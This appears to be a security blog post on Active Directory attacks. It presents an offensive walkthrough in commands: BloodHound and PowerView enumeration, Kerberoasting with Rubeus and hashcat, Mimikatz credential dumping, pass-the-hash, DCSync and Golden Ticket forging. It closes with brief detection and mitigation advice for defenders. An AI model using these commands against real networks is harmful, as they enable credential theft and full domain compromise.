Listen to this Post
Active Directory (AD) remains a prime target for attackers due to its central role in managing identities and access in enterprise environments. Security professionals must understand common attack techniques to defend against them effectively. This guide covers reconnaissance, exploitation, privilege escalation, and lateral movement tactics, along with detection and mitigation strategies.
You Should Know: Practical Techniques & Commands
1. AD Reconnaissance with BloodHound & PowerView
Attackers use tools like BloodHound and PowerView to map AD environments and identify attack paths.
BloodHound Setup & Usage:
Install BloodHound on Kali Linux sudo apt update && sudo apt install bloodhound Start Neo4j (BloodHound database) sudo neo4j start Ingest data using SharpHound (Windows) .\SharpHound.exe -c All --zipfilename ad_data
PowerView Commands for Enumeration:
Get all domain users Get-NetUser | Select-Object samaccountname Find privileged groups Get-NetGroup -GroupName admin Check for misconfigured ACLs Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs
2. Exploiting Misconfigurations & Privilege Escalation
Common misconfigurations include unconstrained delegation, weak service permissions, and excessive privileges.
Kerberoasting Attack (Extracting Service Account Hashes):
Request all SPN tickets Add-Type -AssemblyName System.IdentityModel Setspn -T DOMAIN.LOCAL -Q / Extract hashes with Rubeus .\Rubeus.exe kerberoast /outfile:hashes.txt
Cracking Hashes with Hashcat:
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
3. Pass-the-Hash & Golden Ticket Attacks
Attackers use stolen credentials to move laterally.
Pass-the-Hash (PtH) with Mimikatz:
Dump hashes .\mimikatz.exe "sekurlsa::logonpasswords" Pass-the-Hash attack .\mimikatz.exe "sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH"
Golden Ticket Attack:
Extract KRBTGT hash .\mimikatz.exe "lsadump::dcsync /domain:DOMAIN /user:krbtgt" Forge Golden Ticket .\mimikatz.exe "kerberos::golden /user:fakeadmin /domain:DOMAIN /sid:S-1-5-21-... /krbtgt:HASH /ptt"
4. Detecting & Mitigating AD Attacks
- Enable Windows Event Logs for suspicious activities (
Event ID 4769for Kerberoasting). - Restrict Service Account Permissions (Least Privilege Principle).
- Implement LAPS (Local Administrator Password Solution) to prevent lateral movement.
- Monitor for Anomalous Logins with SIEM tools (Splunk, ELK).
What Undercode Say
Active Directory security is critical in modern enterprises. Attackers continuously evolve techniques, making proactive defense essential. Regular audits, hardening AD configurations, and monitoring for anomalies can significantly reduce risks.
Key Commands Recap:
- BloodHound: Map AD attack paths.
- PowerView: Enumerate users, groups, and permissions.
- Mimikatz: Extract credentials and perform PtH attacks.
- Hashcat: Crack stolen hashes.
- LAPS: Mitigate lateral movement risks.
Stay updated with AD security best practices to defend against evolving threats.
Expected Output:
A fortified AD environment with minimized attack surfaces, continuous monitoring, and rapid incident response capabilities.
Further Reading:
- Microsoft AD Security Best Practices
- BloodHound Official Documentation
- Mitre ATT&CK: Active Directory Attacks
References:
Reported By: Dharamveer Prasad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
